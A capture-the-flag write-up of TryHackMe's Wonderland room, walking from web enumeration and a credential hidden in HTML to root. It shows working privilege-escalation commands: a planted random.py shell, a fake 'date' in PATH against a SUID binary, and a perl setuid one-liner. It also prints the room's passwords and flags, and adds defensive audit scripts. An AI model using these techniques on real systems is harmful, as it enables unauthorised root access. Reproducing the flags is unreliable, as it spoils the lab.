Wonderland (CTF Challenge - THM)

Intro:
Wonderland is a beginner-friendly CTF room on TryHackMe themed around Lewis Carroll's Alice in Wonderland. The challenge walks through a full attack chain — web enumeration, steganography hints, SSH access, Python library hijacking, SUID binary exploitation via PATH manipulation, and Linux capabilities abuse — to escalate from an unprivileged web user all the way to root. Notably, the room reverses the expected flag locations: the user flag lives in /root and the root flag in /home/alice.
Capture the flags
Enter Wonderland and capture the flags.
Answer the questions below
Reconnaissance & Enumeration
nmap -sV -p- IP_Address
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
/r (Status: 301) [Size: 0] [--> r/]
gobuster dir -u http://IP_Address/img -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
gobuster dir -u http://IP_Address/r -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/a (Status: 301) [Size: 0] [--> a/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
gobuster dir -u http://IP_Address/r/a -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/b (Status: 301) [Size: 0] [--> b/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
I noticed that the path segments, taken together, would spell out "rabbit" in full, i.e., http://IP_Address/r/a/b/b/i/t
Details found in recon:
The IP_Address/img directory holds images, and I'm wondering if we should use wget to download them:
alice_door.jpg
alice_door.png
white_rabbit_1.jpg
IP_Address/r:
Keep Going.
"Would you tell me, please, which way I ought to go from here?"
IP_Address/r/a
Keep Going.
"That depends a good deal on where you want to get to," said the Cat.
IP_Address/r/a/b
Keep Going.
"I don’t much care where —" said Alice.
IP_Address/r/a/b/b
Keep Going.
"Then it doesn’t matter which way you go," said the Cat.
Image Analysis
wget http://IP_Address/img/alice_door.jpg http://IP_Address/img/alice_door.png http://IP_Address/img/white_rabbit_1.jpg
strings white_rabbit_1.jpg
strings alice_door.jpg
strings alice_door.png
exiftool alice_door.png
ExifTool Version Number : 11.88
File Name : alice_door.png
Directory : .
File Size : 1800 kB
File Modification Date/Time : 2020:06:01 23:23:17+01:00
File Access Date/Time : 2026:03:27 08:14:15+00:00
File Inode Change Date/Time : 2026:03:27 08:13:28+00:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1962
Image Height : 1942
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 23622
Pixels Per Unit Y : 23622
Pixel Units : meters
Image Size : 1962x1942
Megapixels : 3.8
exiftool alice_door.jpg
ExifTool Version Number : 11.88
File Name : alice_door.jpg
Directory : .
File Size : 1520 kB
File Modification Date/Time : 2020:05:25 17:34:52+01:00
File Access Date/Time : 2026:03:27 08:14:12+00:00
File Inode Change Date/Time : 2026:03:27 08:13:28+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
X Resolution : 600
Y Resolution : 600
Resolution Unit : inches
Software : Adobe Photoshop CS3 Macintosh
Modify Date : 2008:01:20 01:49:10
Color Space : Uncalibrated
Exif Image Width : 1962
Exif Image Height : 1942
Compression : JPEG (old-style)
Thumbnail Offset : 332
Thumbnail Length : 12311
Current IPTC Digest : 460cf28926b856dab09c01a1b0a79077
Application Record Version : 2
IPTC Digest : 460cf28926b856dab09c01a1b0a79077
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
Copyright Flag : False
URL List :
Slices Group Name : De_Alice's_Abenteuer_im_Wunderland_Carroll_pic_03
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 12311 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CS3
Photoshop Quality : 12
Photoshop Format : Progressive
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 4.1-c036 46.276720, Mon Feb 19 2007 22:13:43
Create Date : 2008:01:20 01:47:53-05:00
Metadata Date : 2008:01:20 01:49:10-05:00
Creator Tool : Adobe Photoshop CS3 Macintosh
Format : image/jpeg
Color Mode : RGB
History :
Instance ID : uuid:436B87178CC8DC11A35E97C268772518
Native Digest : 256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;75A2F56A7448AE47A140395308BA4302
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1962
Image Height : 1942
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1962x1942
Megapixels : 3.8
Thumbnail Image : (Binary data 12311 bytes, use -b option to extract)
Obtain the flag in user.txt
Remember the path we found above: browsing to it, or simply running curl http://IP_Address/r/a/b/b/i/t/, reveals the SSH user and their password in the page source.
curl http://IP_Address/r/a/b/b/i/t/
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you\u2019re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they\u2019re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
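The credential above sits in a <p style="display: none;"> element: invisible in a browser, plain text to curl. The script below is an added example (not part of this writeup or the room) of the check a site owner can run over their own published HTML before deploying it: it parses the page, collects any text inside elements hidden by inline CSS or the hidden attribute, and flags the pieces shaped like user:password. The sample page is constructed to mirror the markup above, with a placeholder in place of the real password.

```python
import re
from html.parser import HTMLParser

# Inline styles that hide an element from a browser but not from curl.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
# "name:secret" shaped text; this is a heuristic, so findings need a human look.
CREDENTIAL_LIKE = re.compile(r"^[A-Za-z0-9_.-]+:[^\s:]{6,}$")
# Elements that never get a closing tag, so they must not stay on the open-tag stack.
VOID_TAGS = {"img", "br", "link", "meta", "input", "hr", "area", "base",
             "col", "embed", "source", "track", "wbr"}


class HiddenTextFinder(HTMLParser):
    """Collects text inside elements hidden by inline CSS or the hidden attribute."""

    def __init__(self):
        super().__init__()
        self._open = []          # (tag, started_hidden_region) for each open element
        self._hidden_depth = 0   # how many hidden elements enclose the current text
        self.hidden_text = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return               # void elements cannot contain text
        attributes = dict(attrs)
        style = attributes.get("style") or ""
        hidden = "hidden" in attributes or bool(HIDDEN_STYLE.search(style))
        self._open.append((tag, hidden))
        if hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if not any(open_tag == tag for open_tag, _ in self._open):
            return               # stray closing tag, ignore it
        # Pop back to the matching start tag; tolerates unclosed inner elements.
        while self._open:
            open_tag, hidden = self._open.pop()
            if hidden:
                self._hidden_depth -= 1
            if open_tag == tag:
                break

    def handle_data(self, data):
        text = data.strip()
        if self._hidden_depth and text:
            self.hidden_text.append(text)


def hidden_text(html):
    """Text a browser would not render but a raw fetch exposes."""
    parser = HiddenTextFinder()
    parser.feed(html)
    parser.close()
    return parser.hidden_text


def credential_like(snippets):
    """Filter hidden snippets down to those shaped like user:password."""
    return [s for s in snippets if CREDENTIAL_LIKE.match(s)]


# Constructed sample page modelled on the room's /r/a/b/b/i/t markup; the
# credential value is a placeholder, not the room's real password.
SAMPLE_HTML = """<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>Visible text: the reader is meant to see this.</p>
<p style="display: none;">alice:EXAMPLE_PLACEHOLDER_PASSWORD</p>
<div hidden><span>internal staging note</span></div>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
"""


def audit(html=SAMPLE_HTML):
    """Return (all hidden snippets, the credential-shaped subset)."""
    found = hidden_text(html)
    return found, credential_like(found)


if __name__ == "__main__":
    for snippet in audit()[1]:
        print("credential-shaped hidden text:", snippet)
```

Run it over every page of a static site in CI and fail the build on any credential-shaped hit; anything else it reports (staging notes, commented-out navigation) is worth a look too, since it ships to every visitor.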
wget http://IP_Address/img/white_rabbit_1.jpg
ssh alice@IP_Address
ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
alice@wonderland:~$ cat root.txt
cat: root.txt: Permission denied
alice@wonderland:~$ python3 walrus_and_the_carpenter.py
The line was: And shook his heavy head \u2014
The line was: Before his streaming eyes.
The line was: Of cabbages \u2014 and kings \u2014
The line was: "I deeply sympathize."
The line was: To give a hand to each."
The line was: And scrambling to the shore.
The line was: The eldest Oyster looked at him.
The line was: Are very good indeed \u2014
The line was: There were no birds to fly.
The line was: "A pleasant walk, a pleasant talk,
Full contents of the Python file:
cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright \u2014
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done \u2014
"It\u2019s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head \u2014
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.
"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."
The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head \u2014
Meaning to say he did not choose
To leave the oyster-bed.
But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat \u2014
And this was odd, because, you know,
They hadn\u2019t any feet.
Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more \u2014
All hopping through the frothy waves,
And scrambling to the shore.
The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.
"The time has come," the Walrus said,
"To talk of many things:
Of shoes \u2014 and ships \u2014 and sealing-wax \u2014
Of cabbages \u2014 and kings \u2014
And why the sea is boiling hot \u2014
And whether pigs have wings."
"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.
"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed \u2014
Now if you\u2019re ready Oysters dear,
We can begin to feed."
"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?
"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf \u2014
I\u2019ve had to ask you twice!"
"It seems a shame," the Walrus said,
"To play them such a trick,
After we\u2019ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter\u2019s spread too thick!"
"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.
"O Oysters," said the Carpenter.
"You\u2019ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none \u2014
And that was scarcely odd, because
They\u2019d eaten every one."""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
cat > /home/alice/random.py << 'EOF'
import os
import pty
pty.spawn("/bin/bash")
EOF
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
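The hijack above works because running python3 /home/alice/walrus_and_the_carpenter.py puts the script's own directory, /home/alice, at sys.path[0], ahead of the standard library, so a random.py placed there is what import random loads. The audit script below is an added example, not code from this writeup or the room: it lists which standard-library names a given script could pick up from its own directory, and shows that running the interpreter with -I (isolated mode, which leaves the script directory out of sys.path) removes the exposure. The walrus.py and random.py it writes into a temporary directory are constructed for the demonstration.

```python
import stat
import sys
import tempfile
from pathlib import Path

# Module names to check. sys.stdlib_module_names exists on Python 3.10+; the
# fallback covers the modules a small script like the one above is likely to import.
STDLIB_NAMES = frozenset(getattr(sys, "stdlib_module_names", ())) or frozenset(
    {"random", "os", "sys", "subprocess", "json", "socket", "re", "pty"})


def script_search_dirs(script_path, isolated=False):
    """Directories consulted before the standard library when a script is run.

    `python3 script.py` puts the script's own directory at sys.path[0], so a
    same-named file there wins over the stdlib module. `python3 -I script.py`
    (isolated mode) leaves that directory out, which closes this hijack.
    """
    if isolated:
        return []
    return [Path(script_path).resolve().parent]


def shadowing_files(directory, names=STDLIB_NAMES):
    """Files in `directory` the import system would load instead of a stdlib module."""
    directory = Path(directory)
    hits = []
    for name in sorted(names):
        for candidate in (directory / f"{name}.py", directory / name / "__init__.py"):
            if candidate.is_file():
                st = candidate.stat()
                hits.append({
                    "module": name,
                    "path": str(candidate),
                    "owner_uid": st.st_uid,
                    # group/world write on the file means other users can rewrite it
                    "group_or_world_writable": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
                })
    return hits


def audit_script(script_path, isolated=False):
    """List stdlib modules a script could pick up from its own directory."""
    findings = []
    for directory in script_search_dirs(script_path, isolated):
        findings.extend(shadowing_files(directory))
    return findings


def demo():
    """Constructed scenario: a poem script beside a planted random.py.

    Returns the shadowed module names for a plain run and for a run with -I.
    """
    with tempfile.TemporaryDirectory() as tmp:
        script = Path(tmp, "walrus.py")
        script.write_text("import random\nprint(random.choice(['a', 'b']))\n")
        Path(tmp, "random.py").write_text("# planted: would run instead of the stdlib module\n")
        plain = [f["module"] for f in audit_script(script)]
        isolated = [f["module"] for f in audit_script(script, isolated=True)]
        return plain, isolated


if __name__ == "__main__":
    print(demo())
```

On the room's box the script directory is owned by alice while sudo runs the script as rabbit; the owner_uid field in each finding is there so a reviewer can spot exactly that mismatch. Isolated mode fixes the import path, but the durable fix is to not grant sudo on a script that lives in a directory the invoking user can write.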
/bin/echo -n 'Probably by ' && date --date='next
Probably by Fri, 27 Mar 2026 10:40:45 +0000
rabbit@wonderland:/home/rabbit$ ls -la /home/rabbit/teaParty
-rwsr-sr-x 1 root root 16816 May 25 2020 /home/rabbit/teaParty
rabbit@wonderland:/home/rabbit$ cd /home/rabbit
rabbit@wonderland:/home/rabbit$
rabbit@wonderland:/home/rabbit$ echo '/bin/bash' > date
rabbit@wonderland:/home/rabbit$ chmod +x date
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ ls -la
total 44
drwxr-x--- 2 rabbit rabbit 4096 Mar 27 09:41 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwxr-xr-x 1 rabbit rabbit 10 Mar 27 09:41 date
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
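teaParty resolves date through the caller's PATH, which is why a date script in /home/rabbit, prepended to PATH, ran with hatter's privileges. The script below is an added example, not code from this writeup or the room: it audits a PATH value for entries a less privileged user could control (empty, relative, not root-owned, group- or world-writable), and shows the lookup a SUID or capability-bearing program should do instead, resolving bare names only against a fixed trusted PATH and running with a minimal environment. The temporary directory and the planted date script it creates are constructed for the demonstration; TRUSTED_PATH is an assumed value to adjust to the system's real system directories.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Assumed: the only directories a privileged program should resolve bare names against.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def path_entry_problems(entry):
    """Problems with one $PATH entry, seen from a privilege boundary.

    Empty or relative entries resolve against the caller's working directory,
    and a directory that is not root-owned or is writable by others lets a
    less privileged user plant a same-named program for a privileged caller.
    """
    if entry == "":
        return ["empty entry, resolves to the current directory"]
    if not os.path.isabs(entry):
        return ["relative entry, resolves against the current directory"]
    try:
        st = os.stat(entry)
    except FileNotFoundError:
        return ["does not exist, whoever can write the parent could create it"]
    problems = []
    if st.st_uid != 0:
        problems.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    elif st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    return problems


def audit_path(path_value):
    """Map each problematic entry of a PATH string to its list of problems."""
    findings = {}
    for entry in path_value.split(":"):
        problems = path_entry_problems(entry)
        if problems:
            findings[entry] = problems
    return findings


def resolve_trusted(command, trusted_path=TRUSTED_PATH):
    """Resolve a bare command name against the trusted PATH only, or None.

    This is what a SUID or capability-bearing program should do instead of
    letting the caller's PATH decide which `date` it runs.
    """
    return shutil.which(command, path=trusted_path)


def run_trusted(argv, trusted_path=TRUSTED_PATH):
    """Run argv[0] from the trusted PATH with a minimal, caller-independent environment."""
    exe = resolve_trusted(argv[0], trusted_path)
    if exe is None:
        raise FileNotFoundError(f"{argv[0]!r} is not in the trusted PATH")
    result = subprocess.run([exe, *argv[1:]], env={"PATH": trusted_path},
                            check=True, capture_output=True, text=True)
    return result.stdout


def demo():
    """Constructed scenario: a world-writable directory prepended to PATH.

    Returns (audit findings, whether the caller's PATH picks the planted date,
    whether the trusted lookup avoids it).
    """
    with tempfile.TemporaryDirectory() as planted_dir:
        os.chmod(planted_dir, 0o777)          # anyone can drop a file here
        fake_date = os.path.join(planted_dir, "date")
        with open(fake_date, "w") as fh:
            fh.write("#!/bin/sh\necho not-the-real-date\n")
        os.chmod(fake_date, 0o755)
        caller_path = f"{planted_dir}:{TRUSTED_PATH}"
        findings = audit_path(caller_path)
        picks_planted = shutil.which("date", path=caller_path) == fake_date
        trusted_avoids = resolve_trusted("date") != fake_date
        return findings, picks_planted, trusted_avoids


if __name__ == "__main__":
    findings, picks_planted, trusted_avoids = demo()
    for entry, problems in findings.items():
        print(entry, "->", "; ".join(problems))
    print("caller PATH picks planted date:", picks_planted)
    print("trusted lookup avoids it:", trusted_avoids)
```

For a native SUID binary the equivalent is an absolute path in the exec call (or a setenv of PATH to the trusted value before any system() call) plus a cleared environment; the audit half is useful on its own for checking the PATH that cron jobs and sudo rules actually run under.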
This gives us a shell as hatter, whose home directory reveals hatter's password, a step toward escalating to root:
cd /home/hatter
cat password.txt
WhyIsARavenLikeAWritingDesk?
We finally have our user flag:
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
# user flag (it's in /root - this room reverses the flag locations)
cat /root/user.txt
thm{"Curiouser and curiouser!"}
Escalate your privileges, what is the flag in root.txt?
The root flag is in this path:
# root flag (it's in alice's home)
cat /home/alice/root.txt
whoami
hatter
hatter@wonderland:/home/hatter$ id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home/hatter$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
bash: /usr/bin/perl5.26.1: Permission denied
sudo -l
[sudo] password for hatter:
Sorry, user hatter may not run sudo on wonderland.
After SSHing in directly as hatter, so the session carries hatter's own group membership rather than rabbit's, the same command succeeds:
hatter@wonderland:/home/hatter$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:~# find / -type f -name root.txt 2>/dev/null
/home/alice/root.txt
root@wonderland:~# cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you're at!}
Conclusion:
Key Takeaways:
- Follow the theme — the /r/a/b/b/i/t path was hidden in plain sight; the Alice in Wonderland theme was a direct hint at what word to spell out
- Hidden HTML elements leak credentials — display: none is not security; always curl and read the raw source
- Python library hijacking — when a script uses import random without an absolute path, and you control the working directory, you can drop a malicious random.py to hijack execution
- PATH hijacking with SUID binaries — if a SUID binary calls a command by name (not full path), placing a fake version earlier in $PATH runs your code with the binary's elevated privileges
- Linux capabilities as a privesc vector — cap_setuid on perl is as good as a SUID binary; always run getcap -r / 2>/dev/null in your enumeration checklist
- Group context matters — the perl privesc failed until SSHing in directly as hatter to inherit the correct group membership
Remediation:
- Avoid embedding credentials in HTML, even in hidden elements
- Pin library imports using absolute paths or virtual environments in sensitive scripts
- Avoid calling system binaries by name in SUID/capability-enabled programs; use full absolute paths
- Audit Linux capabilities regularly — cap_setuid on interpreters like Perl or Python should never appear in production
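For the capability audit the last item asks for, this is an added example (not from this writeup or the room) of turning getcap -r / 2>/dev/null output into findings: it parses both the older "/path = cap_x+ep" and the newer "/path cap_x=ep" line formats, ignores inheritable-only capabilities, and rates a root-equivalent capability on an interpreter such as perl or python as critical, since, as the takeaways note, cap_setuid on perl is as good as a SUID binary. The sample output is constructed; the perl5.26.1 line mirrors the binary used above, and the set of root-equivalent capabilities and interpreter names are assumptions to extend for your own environment.

```python
import os
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path caps interpreter severity")

# Assumed set of file capabilities that amount to root: become any uid/gid,
# bypass DAC, load modules, trace anything, or take over file ownership.
ROOT_EQUIVALENT = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                   "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_fowner",
                   "cap_chown", "all"}
# Binaries that run whatever code the caller hands them; a root-equivalent
# capability on one of these is as good as a SUID shell.
INTERPRETER = re.compile(r"^(perl|python|ruby|node|php|lua|bash|sh|tclsh)[0-9.]*$")

# getcap -r prints "/path = cap_x+ep" with libcap before 2.41 and
# "/path cap_x=ep" from 2.41 on; both are accepted here.
OLD_FORMAT = re.compile(r"^(?P<path>\S+) = (?P<caps>.+)$")
NEW_FORMAT = re.compile(r"^(?P<path>\S+) (?P<caps>\S*=.+)$")
# One clause: comma-separated cap names, then +, = or - and flag letters (e, p, i).
CLAUSE = re.compile(r"^([a-z0-9_,]*)(?:[+=\-]([a-z]*))?$")


def parse_getcap_line(line):
    """Return (path, set of permitted/effective caps) for one getcap line, else None."""
    line = line.strip()
    match = OLD_FORMAT.match(line) or NEW_FORMAT.match(line)
    if not match:
        return None
    active = set()
    for clause in match.group("caps").split():
        parsed = CLAUSE.match(clause)
        if not parsed:
            continue
        names = parsed.group(1).split(",") if parsed.group(1) else ["all"]
        flags = parsed.group(2) or ""
        # effective or permitted caps are usable by the binary itself;
        # inheritable-only caps are not
        if "p" in flags or "e" in flags:
            active.update(names)
    return match.group("path"), active


def assess(path, caps):
    """Rate one binary: a root-equivalent cap on an interpreter is the worst case."""
    is_interpreter = bool(INTERPRETER.match(os.path.basename(path)))
    dangerous = bool(caps & ROOT_EQUIVALENT)
    if dangerous and is_interpreter:
        severity = "critical"
    elif dangerous:
        severity = "high"
    elif caps:
        severity = "info"
    else:
        severity = "none"
    return Finding(path, sorted(caps), is_interpreter, severity)


def audit_getcap_output(text):
    """Turn raw getcap -r output into findings, in input order."""
    findings = []
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if parsed:
            findings.append(assess(*parsed))
    return findings


# Constructed sample output. The perl5.26.1 entry mirrors the binary used in
# the room; mtr-packet and ping are typical Ubuntu entries, and the last two
# lines use the newer libcap format to exercise both parsers.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=i
"""


if __name__ == "__main__":
    for finding in audit_getcap_output(SAMPLE_GETCAP):
        print(f"{finding.severity:8} {finding.path} {','.join(finding.caps) or '-'}")
```

Feed it the real output with audit_getcap_output(subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout) from a privileged host scan; anything rated critical is the perl situation from this room and should be stripped with setcap -r, and anything rated high deserves a justification on record.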



